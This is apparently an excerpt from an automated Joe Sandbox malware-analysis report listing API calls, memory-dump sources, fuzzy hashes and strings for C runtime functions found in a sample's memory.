                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a71ec04ae8626412ffb78d25914532997f0625c008a083428f895c513c4268fe
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EF03132A00119BBCB206FA7DC28D5AFF6AFF456E03854515FA1DC6524CB71E461DBD0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,00000000,?,02F23A84,00000000,00000001,00000000,00000000,?,02F17596,?,?,00000000), ref: 02F26FB1
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,02F23A84,00000000,00000001,00000000,00000000,?,02F17596,?,?,00000000,?,00000000,?,02F17AE2,8B18EC83), ref: 02F26FBD
                                                                                                                                                                                                                          • Part of subcall function 02F26F83: CloseHandle.KERNEL32(FFFFFFFE,02F26FCD,?,02F23A84,00000000,00000001,00000000,00000000,?,02F17596,?,?,00000000,?,00000000), ref: 02F26F93
                                                                                                                                                                                                                        • ___initconout.LIBCMT ref: 02F26FCD
                                                                                                                                                                                                                          • Part of subcall function 02F26F45: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,02F26F74,02F23A71,00000000,?,02F17596,?,?,00000000,?), ref: 02F26F58
                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,?,02F23A84,00000000,00000001,00000000,00000000,?,02F17596,?,?,00000000,?), ref: 02F26FE2
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2744216297-0
                                                                                                                                                                                                                        • Opcode ID: 8d51e4b296b63a1e5336d92c9f0c90a2707d88f0cc73e59cccddbfb517b9fac5
                                                                                                                                                                                                                        • Instruction ID: 6452cea827ff593512d4421172f3c3a6f5cd371452222269b82d312e79421347
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d51e4b296b63a1e5336d92c9f0c90a2707d88f0cc73e59cccddbfb517b9fac5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8F01C3A84022DBBCF626FD1DC08E997F6BFB493E0B404414FA08C5120EA32C870DB90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • SleepConditionVariableCS.KERNEL32(?,02F097F7,00000064,?,02EE8A41,02F4BDC0), ref: 02F0987D
                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(02F47FA8,02F4BDC0,?,02F097F7,00000064,?,02EE8A41,02F4BDC0), ref: 02F09887
                                                                                                                                                                                                                        • WaitForSingleObjectEx.KERNEL32(02F4BDC0,00000000,?,02F097F7,00000064,?,02EE8A41,02F4BDC0), ref: 02F09898
                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(02F47FA8,?,02F097F7,00000064,?,02EE8A41,02F4BDC0), ref: 02F0989F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3269011525-0
                                                                                                                                                                                                                        • Opcode ID: 9147b0a28a1ced1d6d73cfb3e83bb43053f6d8cd26e73db25708c80c188d6e68
                                                                                                                                                                                                                        • Instruction ID: e9e9cbf5f87e81ea9ad2ac11b718105798413d804b7696da31fce33b41b23983
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9147b0a28a1ced1d6d73cfb3e83bb43053f6d8cd26e73db25708c80c188d6e68
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EE01236EC5128ABEA023B50EC09A9EFF55BF14AE2B400615FA0966150CFF158719BD4
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F14164
                                                                                                                                                                                                                          • Part of subcall function 02F17C06: HeapFree.KERNEL32(00000000,00000000,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?), ref: 02F17C1C
                                                                                                                                                                                                                          • Part of subcall function 02F17C06: GetLastError.KERNEL32(?,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?,?), ref: 02F17C2E
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F14177
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F14188
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F14199
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                        • Opcode ID: 12342684781bf7efcab4ac2531f5581436b4fb636ae850b2c993f13ca6cda46a
                                                                                                                                                                                                                        • Instruction ID: a9dfd7a050fcde8764cc42288fec888b80f86dc51d3f153b6372377c99c01ca4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12342684781bf7efcab4ac2531f5581436b4fb636ae850b2c993f13ca6cda46a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0E04FFDC9156C9AD7523F10BC04805FAA2B728BD03510806E61C22210C7B21872AFC2
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 02F12F0D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                                                                                        • String ID: pow
                                                                                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                        • Opcode ID: 14c78fbd0360217775f7ca502b3cd1a048690319a7ed0f4af3b8307fdaf4ec44
                                                                                                                                                                                                                        • Instruction ID: b48c5cd7602fd6dc6a993be89e7d9eb3ade514880587a9b8939b4d115999786d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14c78fbd0360217775f7ca502b3cd1a048690319a7ed0f4af3b8307fdaf4ec44
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE519A62F0810696CB15BB58C9503AA7BF4EB40BC4FE04D58EA96462D8EF35C4D1CF86
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
                                                                                                                                                                                                                        • API String ID: 0-433915104
                                                                                                                                                                                                                        • Opcode ID: e80b5455520266f734a1e6412381912e36d428b28aa49f50a40f31473f2108e4
                                                                                                                                                                                                                        • Instruction ID: 4f730fc4f61d6446a29615d39c3e590e30db3056dc7c208e01f36a5ed13173ca
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e80b5455520266f734a1e6412381912e36d428b28aa49f50a40f31473f2108e4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E4193B1E00258AFDB25DF99CC81D9EBBFDEB94790F9000A6E604A7340DBB19A40CF50
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 02F0CDE1
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: EncodePointer
                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                        • Opcode ID: c2a84fcdb258a1e6d1c4ae61d1a10b1abab10bb25dc53f1e97309153d38f82a6
                                                                                                                                                                                                                        • Instruction ID: 383a9d6c97ce5cd4adb8d485bbc3dcbc94f8a97ff5ba39f76e77c6a9f8a13d55
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2a84fcdb258a1e6d1c4ae61d1a10b1abab10bb25dc53f1e97309153d38f82a6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22412B71D00209AFCF15DF94CD80AAEBBB6FF48384F15825AFA04A7291D3759960EF51
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02EE44EB
                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 02EE453A
                                                                                                                                                                                                                          • Part of subcall function 02F0863E: _Yarn.LIBCPMT ref: 02F0865D
                                                                                                                                                                                                                          • Part of subcall function 02F0863E: _Yarn.LIBCPMT ref: 02F08681
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                        • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                        • Opcode ID: f10107f7a22053e2993a21685be769c810f7d5764d4f7fa72d68c459904cb6aa
                                                                                                                                                                                                                        • Instruction ID: 2a3c704bbc4b10b66bc4c4710b8a77685a3ec391e6fe56620eeeef476d43ad7d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f10107f7a22053e2993a21685be769c810f7d5764d4f7fa72d68c459904cb6aa
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD119E71904B849FE320CF68C900B47BBE4EF19754F008A1EE49AC7B80D7B5A5048BA5